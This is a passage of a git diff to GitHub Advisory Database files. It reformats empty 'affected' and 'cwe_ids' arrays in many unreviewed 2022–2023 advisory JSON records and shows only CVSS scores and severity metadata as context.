b/advisories/unreviewed/2022/05/GHSA-x4mh-6g26-xmv9/GHSA-x4mh-6g26-xmv9.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -43,9 +41,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-x7j9-3xc5-f64w/GHSA-x7j9-3xc5-f64w.json b/advisories/unreviewed/2022/05/GHSA-x7j9-3xc5-f64w/GHSA-x7j9-3xc5-f64w.json index 8090bad5c17..ebc9fd2e8fb 100644 --- a/advisories/unreviewed/2022/05/GHSA-x7j9-3xc5-f64w/GHSA-x7j9-3xc5-f64w.json +++ b/advisories/unreviewed/2022/05/GHSA-x7j9-3xc5-f64w/GHSA-x7j9-3xc5-f64w.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-x8q3-q9x3-w9jr/GHSA-x8q3-q9x3-w9jr.json b/advisories/unreviewed/2022/05/GHSA-x8q3-q9x3-w9jr/GHSA-x8q3-q9x3-w9jr.json index f7f73575e55..657184f1fcc 100644 --- a/advisories/unreviewed/2022/05/GHSA-x8q3-q9x3-w9jr/GHSA-x8q3-q9x3-w9jr.json +++ b/advisories/unreviewed/2022/05/GHSA-x8q3-q9x3-w9jr/GHSA-x8q3-q9x3-w9jr.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -27,9 +25,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-x9v7-5j9h-jp2f/GHSA-x9v7-5j9h-jp2f.json b/advisories/unreviewed/2022/05/GHSA-x9v7-5j9h-jp2f/GHSA-x9v7-5j9h-jp2f.json index 6ed018a54bf..ca26d76a2dc 100644 --- a/advisories/unreviewed/2022/05/GHSA-x9v7-5j9h-jp2f/GHSA-x9v7-5j9h-jp2f.json +++ b/advisories/unreviewed/2022/05/GHSA-x9v7-5j9h-jp2f/GHSA-x9v7-5j9h-jp2f.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-xf5w-2jf5-86c8/GHSA-xf5w-2jf5-86c8.json b/advisories/unreviewed/2022/05/GHSA-xf5w-2jf5-86c8/GHSA-xf5w-2jf5-86c8.json index b7418b19c28..bcae588671b 100644 --- a/advisories/unreviewed/2022/05/GHSA-xf5w-2jf5-86c8/GHSA-xf5w-2jf5-86c8.json +++ b/advisories/unreviewed/2022/05/GHSA-xf5w-2jf5-86c8/GHSA-xf5w-2jf5-86c8.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-xfcv-3pjr-4749/GHSA-xfcv-3pjr-4749.json b/advisories/unreviewed/2022/05/GHSA-xfcv-3pjr-4749/GHSA-xfcv-3pjr-4749.json index 6a18208a9b9..9721c52f5ef 100644 --- a/advisories/unreviewed/2022/05/GHSA-xfcv-3pjr-4749/GHSA-xfcv-3pjr-4749.json +++ b/advisories/unreviewed/2022/05/GHSA-xfcv-3pjr-4749/GHSA-xfcv-3pjr-4749.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -27,9 +25,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "CRITICAL", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-xg9f-gj9x-f37p/GHSA-xg9f-gj9x-f37p.json b/advisories/unreviewed/2022/05/GHSA-xg9f-gj9x-f37p/GHSA-xg9f-gj9x-f37p.json index 901c91d83e9..07c5b56e779 100644 --- a/advisories/unreviewed/2022/05/GHSA-xg9f-gj9x-f37p/GHSA-xg9f-gj9x-f37p.json +++ b/advisories/unreviewed/2022/05/GHSA-xg9f-gj9x-f37p/GHSA-xg9f-gj9x-f37p.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-xmwp-m859-hfcj/GHSA-xmwp-m859-hfcj.json b/advisories/unreviewed/2022/05/GHSA-xmwp-m859-hfcj/GHSA-xmwp-m859-hfcj.json index 60f1977d81e..90548a6d10c 100644 --- a/advisories/unreviewed/2022/05/GHSA-xmwp-m859-hfcj/GHSA-xmwp-m859-hfcj.json +++ b/advisories/unreviewed/2022/05/GHSA-xmwp-m859-hfcj/GHSA-xmwp-m859-hfcj.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -39,9 +37,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-xp2v-6m36-vc7m/GHSA-xp2v-6m36-vc7m.json b/advisories/unreviewed/2022/05/GHSA-xp2v-6m36-vc7m/GHSA-xp2v-6m36-vc7m.json index 1ff749539a8..fcffed858c5 100644 --- a/advisories/unreviewed/2022/05/GHSA-xp2v-6m36-vc7m/GHSA-xp2v-6m36-vc7m.json +++ b/advisories/unreviewed/2022/05/GHSA-xp2v-6m36-vc7m/GHSA-xp2v-6m36-vc7m.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-xqfw-prqj-gxqv/GHSA-xqfw-prqj-gxqv.json b/advisories/unreviewed/2022/05/GHSA-xqfw-prqj-gxqv/GHSA-xqfw-prqj-gxqv.json index 1ebb0e0214c..8bd6b63ebe5 100644 --- a/advisories/unreviewed/2022/05/GHSA-xqfw-prqj-gxqv/GHSA-xqfw-prqj-gxqv.json +++ b/advisories/unreviewed/2022/05/GHSA-xqfw-prqj-gxqv/GHSA-xqfw-prqj-gxqv.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -39,9 +37,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-xqqc-m37j-mrfx/GHSA-xqqc-m37j-mrfx.json b/advisories/unreviewed/2022/05/GHSA-xqqc-m37j-mrfx/GHSA-xqqc-m37j-mrfx.json index 0483cdd12fc..4d3f1b42367 100644 --- a/advisories/unreviewed/2022/05/GHSA-xqqc-m37j-mrfx/GHSA-xqqc-m37j-mrfx.json +++ b/advisories/unreviewed/2022/05/GHSA-xqqc-m37j-mrfx/GHSA-xqqc-m37j-mrfx.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-xv84-c645-853v/GHSA-xv84-c645-853v.json b/advisories/unreviewed/2022/05/GHSA-xv84-c645-853v/GHSA-xv84-c645-853v.json index 1181dc7adbb..e315cb81d2e 100644 --- a/advisories/unreviewed/2022/05/GHSA-xv84-c645-853v/GHSA-xv84-c645-853v.json +++ b/advisories/unreviewed/2022/05/GHSA-xv84-c645-853v/GHSA-xv84-c645-853v.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -35,9 +33,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-xw2v-wvvx-29jq/GHSA-xw2v-wvvx-29jq.json b/advisories/unreviewed/2022/05/GHSA-xw2v-wvvx-29jq/GHSA-xw2v-wvvx-29jq.json index 6f862e7799a..a10617692de 100644 --- a/advisories/unreviewed/2022/05/GHSA-xw2v-wvvx-29jq/GHSA-xw2v-wvvx-29jq.json +++ b/advisories/unreviewed/2022/05/GHSA-xw2v-wvvx-29jq/GHSA-xw2v-wvvx-29jq.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -31,9 +29,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-xxj3-q67x-cf44/GHSA-xxj3-q67x-cf44.json b/advisories/unreviewed/2022/05/GHSA-xxj3-q67x-cf44/GHSA-xxj3-q67x-cf44.json index af554b9dd3d..db1ac85f5fb 100644 --- a/advisories/unreviewed/2022/05/GHSA-xxj3-q67x-cf44/GHSA-xxj3-q67x-cf44.json +++ b/advisories/unreviewed/2022/05/GHSA-xxj3-q67x-cf44/GHSA-xxj3-q67x-cf44.json @@ -13,9 +13,7 @@ "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", @@ -35,9 +33,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "CRITICAL", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2023/02/GHSA-278x-ph66-x5gw/GHSA-278x-ph66-x5gw.json b/advisories/unreviewed/2023/02/GHSA-278x-ph66-x5gw/GHSA-278x-ph66-x5gw.json index 00523538be0..991a229137e 100644 --- a/advisories/unreviewed/2023/02/GHSA-278x-ph66-x5gw/GHSA-278x-ph66-x5gw.json +++ b/advisories/unreviewed/2023/02/GHSA-278x-ph66-x5gw/GHSA-278x-ph66-x5gw.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2023/02/GHSA-3j56-76c6-9xf6/GHSA-3j56-76c6-9xf6.json b/advisories/unreviewed/2023/02/GHSA-3j56-76c6-9xf6/GHSA-3j56-76c6-9xf6.json index 6afaf4b9d59..73506f0cab1 100644 --- a/advisories/unreviewed/2023/02/GHSA-3j56-76c6-9xf6/GHSA-3j56-76c6-9xf6.json +++ b/advisories/unreviewed/2023/02/GHSA-3j56-76c6-9xf6/GHSA-3j56-76c6-9xf6.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2023/02/GHSA-64g7-pj84-564f/GHSA-64g7-pj84-564f.json b/advisories/unreviewed/2023/02/GHSA-64g7-pj84-564f/GHSA-64g7-pj84-564f.json index 4e5ef2c5d49..96c13465b56 100644 --- a/advisories/unreviewed/2023/02/GHSA-64g7-pj84-564f/GHSA-64g7-pj84-564f.json +++ b/advisories/unreviewed/2023/02/GHSA-64g7-pj84-564f/GHSA-64g7-pj84-564f.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2023/02/GHSA-6rw9-xp67-2fp9/GHSA-6rw9-xp67-2fp9.json b/advisories/unreviewed/2023/02/GHSA-6rw9-xp67-2fp9/GHSA-6rw9-xp67-2fp9.json index b2a68b82745..46d15026a3b 100644 --- a/advisories/unreviewed/2023/02/GHSA-6rw9-xp67-2fp9/GHSA-6rw9-xp67-2fp9.json +++ b/advisories/unreviewed/2023/02/GHSA-6rw9-xp67-2fp9/GHSA-6rw9-xp67-2fp9.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2023/02/GHSA-6v7v-j76p-2497/GHSA-6v7v-j76p-2497.json b/advisories/unreviewed/2023/02/GHSA-6v7v-j76p-2497/GHSA-6v7v-j76p-2497.json index 7c71be47601..138cc1ebfd8 100644 --- a/advisories/unreviewed/2023/02/GHSA-6v7v-j76p-2497/GHSA-6v7v-j76p-2497.json +++ b/advisories/unreviewed/2023/02/GHSA-6v7v-j76p-2497/GHSA-6v7v-j76p-2497.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2023/02/GHSA-83ww-mmm6-5jfp/GHSA-83ww-mmm6-5jfp.json b/advisories/unreviewed/2023/02/GHSA-83ww-mmm6-5jfp/GHSA-83ww-mmm6-5jfp.json index 9ddc4e36442..402695984b6 100644 --- a/advisories/unreviewed/2023/02/GHSA-83ww-mmm6-5jfp/GHSA-83ww-mmm6-5jfp.json +++ b/advisories/unreviewed/2023/02/GHSA-83ww-mmm6-5jfp/GHSA-83ww-mmm6-5jfp.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2023/02/GHSA-89gg-r749-m2mc/GHSA-89gg-r749-m2mc.json b/advisories/unreviewed/2023/02/GHSA-89gg-r749-m2mc/GHSA-89gg-r749-m2mc.json index 77bffd92736..fd7c47960b6 100644 --- a/advisories/unreviewed/2023/02/GHSA-89gg-r749-m2mc/GHSA-89gg-r749-m2mc.json +++ b/advisories/unreviewed/2023/02/GHSA-89gg-r749-m2mc/GHSA-89gg-r749-m2mc.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2023/02/GHSA-9j65-jf8c-2vqp/GHSA-9j65-jf8c-2vqp.json b/advisories/unreviewed/2023/02/GHSA-9j65-jf8c-2vqp/GHSA-9j65-jf8c-2vqp.json index ef500f2108c..a6de8554061 100644 --- a/advisories/unreviewed/2023/02/GHSA-9j65-jf8c-2vqp/GHSA-9j65-jf8c-2vqp.json +++ b/advisories/unreviewed/2023/02/GHSA-9j65-jf8c-2vqp/GHSA-9j65-jf8c-2vqp.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2023/02/GHSA-fmqp-m7p4-c7xq/GHSA-fmqp-m7p4-c7xq.json b/advisories/unreviewed/2023/02/GHSA-fmqp-m7p4-c7xq/GHSA-fmqp-m7p4-c7xq.json index 708ddce745e..dd0c11030ab 100644 --- a/advisories/unreviewed/2023/02/GHSA-fmqp-m7p4-c7xq/GHSA-fmqp-m7p4-c7xq.json +++ b/advisories/unreviewed/2023/02/GHSA-fmqp-m7p4-c7xq/GHSA-fmqp-m7p4-c7xq.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2023/02/GHSA-gj5q-vrv4-xj86/GHSA-gj5q-vrv4-xj86.json b/advisories/unreviewed/2023/02/GHSA-gj5q-vrv4-xj86/GHSA-gj5q-vrv4-xj86.json index 40ef87e0c86..0daa590d568 100644 --- a/advisories/unreviewed/2023/02/GHSA-gj5q-vrv4-xj86/GHSA-gj5q-vrv4-xj86.json +++ b/advisories/unreviewed/2023/02/GHSA-gj5q-vrv4-xj86/GHSA-gj5q-vrv4-xj86.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2023/02/GHSA-hh45-w5qf-pxvx/GHSA-hh45-w5qf-pxvx.json b/advisories/unreviewed/2023/02/GHSA-hh45-w5qf-pxvx/GHSA-hh45-w5qf-pxvx.json index 3511f1bce13..55e24df2307 100644 --- a/advisories/unreviewed/2023/02/GHSA-hh45-w5qf-pxvx/GHSA-hh45-w5qf-pxvx.json +++ b/advisories/unreviewed/2023/02/GHSA-hh45-w5qf-pxvx/GHSA-hh45-w5qf-pxvx.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2023/02/GHSA-j29q-2hmg-pfvh/GHSA-j29q-2hmg-pfvh.json b/advisories/unreviewed/2023/02/GHSA-j29q-2hmg-pfvh/GHSA-j29q-2hmg-pfvh.json index ee705d00f17..e221f85ae7b 100644 --- a/advisories/unreviewed/2023/02/GHSA-j29q-2hmg-pfvh/GHSA-j29q-2hmg-pfvh.json +++ b/advisories/unreviewed/2023/02/GHSA-j29q-2hmg-pfvh/GHSA-j29q-2hmg-pfvh.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2023/02/GHSA-mh3v-4v9f-v2qv/GHSA-mh3v-4v9f-v2qv.json b/advisories/unreviewed/2023/02/GHSA-mh3v-4v9f-v2qv/GHSA-mh3v-4v9f-v2qv.json index fbc0121241a..46773e91708 100644 --- a/advisories/unreviewed/2023/02/GHSA-mh3v-4v9f-v2qv/GHSA-mh3v-4v9f-v2qv.json +++ b/advisories/unreviewed/2023/02/GHSA-mh3v-4v9f-v2qv/GHSA-mh3v-4v9f-v2qv.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2023/02/GHSA-mwvr-cxm3-4rfx/GHSA-mwvr-cxm3-4rfx.json b/advisories/unreviewed/2023/02/GHSA-mwvr-cxm3-4rfx/GHSA-mwvr-cxm3-4rfx.json index 93bda6cf91e..72771f8ed6b 100644 --- a/advisories/unreviewed/2023/02/GHSA-mwvr-cxm3-4rfx/GHSA-mwvr-cxm3-4rfx.json +++ b/advisories/unreviewed/2023/02/GHSA-mwvr-cxm3-4rfx/GHSA-mwvr-cxm3-4rfx.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2023/02/GHSA-q3j4-865v-r93h/GHSA-q3j4-865v-r93h.json b/advisories/unreviewed/2023/02/GHSA-q3j4-865v-r93h/GHSA-q3j4-865v-r93h.json index e869b3cd61c..8df619580de 100644 --- a/advisories/unreviewed/2023/02/GHSA-q3j4-865v-r93h/GHSA-q3j4-865v-r93h.json +++ b/advisories/unreviewed/2023/02/GHSA-q3j4-865v-r93h/GHSA-q3j4-865v-r93h.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2023/02/GHSA-qjhr-gq7c-8mxc/GHSA-qjhr-gq7c-8mxc.json b/advisories/unreviewed/2023/02/GHSA-qjhr-gq7c-8mxc/GHSA-qjhr-gq7c-8mxc.json index 4da09019ee3..2fb28c85441 100644 --- a/advisories/unreviewed/2023/02/GHSA-qjhr-gq7c-8mxc/GHSA-qjhr-gq7c-8mxc.json +++ b/advisories/unreviewed/2023/02/GHSA-qjhr-gq7c-8mxc/GHSA-qjhr-gq7c-8mxc.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2023/02/GHSA-r487-8f57-hj96/GHSA-r487-8f57-hj96.json b/advisories/unreviewed/2023/02/GHSA-r487-8f57-hj96/GHSA-r487-8f57-hj96.json index cd0d6d28c4b..40371934fcc 100644 --- a/advisories/unreviewed/2023/02/GHSA-r487-8f57-hj96/GHSA-r487-8f57-hj96.json +++ b/advisories/unreviewed/2023/02/GHSA-r487-8f57-hj96/GHSA-r487-8f57-hj96.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2023/02/GHSA-r6x6-vqh9-prpr/GHSA-r6x6-vqh9-prpr.json b/advisories/unreviewed/2023/02/GHSA-r6x6-vqh9-prpr/GHSA-r6x6-vqh9-prpr.json index aa25a185718..19b28fc94fd 100644 --- a/advisories/unreviewed/2023/02/GHSA-r6x6-vqh9-prpr/GHSA-r6x6-vqh9-prpr.json +++ b/advisories/unreviewed/2023/02/GHSA-r6x6-vqh9-prpr/GHSA-r6x6-vqh9-prpr.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2023/02/GHSA-vr32-g8rc-qgw4/GHSA-vr32-g8rc-qgw4.json b/advisories/unreviewed/2023/02/GHSA-vr32-g8rc-qgw4/GHSA-vr32-g8rc-qgw4.json index aab148bd83c..4ff3ff2b9ae 100644 --- a/advisories/unreviewed/2023/02/GHSA-vr32-g8rc-qgw4/GHSA-vr32-g8rc-qgw4.json +++ b/advisories/unreviewed/2023/02/GHSA-vr32-g8rc-qgw4/GHSA-vr32-g8rc-qgw4.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2023/02/GHSA-w2p5-vj22-45fp/GHSA-w2p5-vj22-45fp.json b/advisories/unreviewed/2023/02/GHSA-w2p5-vj22-45fp/GHSA-w2p5-vj22-45fp.json index 1fa23b5060f..95b1601a57b 100644 --- a/advisories/unreviewed/2023/02/GHSA-w2p5-vj22-45fp/GHSA-w2p5-vj22-45fp.json +++ b/advisories/unreviewed/2023/02/GHSA-w2p5-vj22-45fp/GHSA-w2p5-vj22-45fp.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2023/02/GHSA-ww3h-62p9-9xf2/GHSA-ww3h-62p9-9xf2.json b/advisories/unreviewed/2023/02/GHSA-ww3h-62p9-9xf2/GHSA-ww3h-62p9-9xf2.json index 7b1e7e0777b..8a0570606d9 100644 --- a/advisories/unreviewed/2023/02/GHSA-ww3h-62p9-9xf2/GHSA-ww3h-62p9-9xf2.json +++ b/advisories/unreviewed/2023/02/GHSA-ww3h-62p9-9xf2/GHSA-ww3h-62p9-9xf2.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2023/03/GHSA-58jw-58x8-342p/GHSA-58jw-58x8-342p.json b/advisories/unreviewed/2023/03/GHSA-58jw-58x8-342p/GHSA-58jw-58x8-342p.json index f2b4f85a4cb..b9d5822dd4d 100644 --- a/advisories/unreviewed/2023/03/GHSA-58jw-58x8-342p/GHSA-58jw-58x8-342p.json +++ b/advisories/unreviewed/2023/03/GHSA-58jw-58x8-342p/GHSA-58jw-58x8-342p.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2023/03/GHSA-7mvh-wrx9-f9mm/GHSA-7mvh-wrx9-f9mm.json b/advisories/unreviewed/2023/03/GHSA-7mvh-wrx9-f9mm/GHSA-7mvh-wrx9-f9mm.json index 1797bb945b1..61f212e2bba 100644 --- a/advisories/unreviewed/2023/03/GHSA-7mvh-wrx9-f9mm/GHSA-7mvh-wrx9-f9mm.json +++ b/advisories/unreviewed/2023/03/GHSA-7mvh-wrx9-f9mm/GHSA-7mvh-wrx9-f9mm.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2023/03/GHSA-8jv3-m55x-9hjx/GHSA-8jv3-m55x-9hjx.json b/advisories/unreviewed/2023/03/GHSA-8jv3-m55x-9hjx/GHSA-8jv3-m55x-9hjx.json index 0e73273a00a..975058d1a2c 100644 --- a/advisories/unreviewed/2023/03/GHSA-8jv3-m55x-9hjx/GHSA-8jv3-m55x-9hjx.json +++ b/advisories/unreviewed/2023/03/GHSA-8jv3-m55x-9hjx/GHSA-8jv3-m55x-9hjx.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2023/03/GHSA-grhp-f8w5-jcw8/GHSA-grhp-f8w5-jcw8.json b/advisories/unreviewed/2023/03/GHSA-grhp-f8w5-jcw8/GHSA-grhp-f8w5-jcw8.json index 035d9f75d44..be407d0d170 100644 --- a/advisories/unreviewed/2023/03/GHSA-grhp-f8w5-jcw8/GHSA-grhp-f8w5-jcw8.json +++ b/advisories/unreviewed/2023/03/GHSA-grhp-f8w5-jcw8/GHSA-grhp-f8w5-jcw8.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2023/04/GHSA-2pgq-w6mw-xjv4/GHSA-2pgq-w6mw-xjv4.json b/advisories/unreviewed/2023/04/GHSA-2pgq-w6mw-xjv4/GHSA-2pgq-w6mw-xjv4.json index 8773df6ef3b..cb20d7c1b8c 100644 --- a/advisories/unreviewed/2023/04/GHSA-2pgq-w6mw-xjv4/GHSA-2pgq-w6mw-xjv4.json +++ b/advisories/unreviewed/2023/04/GHSA-2pgq-w6mw-xjv4/GHSA-2pgq-w6mw-xjv4.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2023/04/GHSA-3rwq-2648-vg59/GHSA-3rwq-2648-vg59.json b/advisories/unreviewed/2023/04/GHSA-3rwq-2648-vg59/GHSA-3rwq-2648-vg59.json index 4d87d8e2311..ff4d2c95afc 100644 --- a/advisories/unreviewed/2023/04/GHSA-3rwq-2648-vg59/GHSA-3rwq-2648-vg59.json +++ b/advisories/unreviewed/2023/04/GHSA-3rwq-2648-vg59/GHSA-3rwq-2648-vg59.json @@ -13,9 +13,7 @@ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" } ], - "affected": [ - - ], + "affected": [], "references": [ { "type": "ADVISORY", diff --git 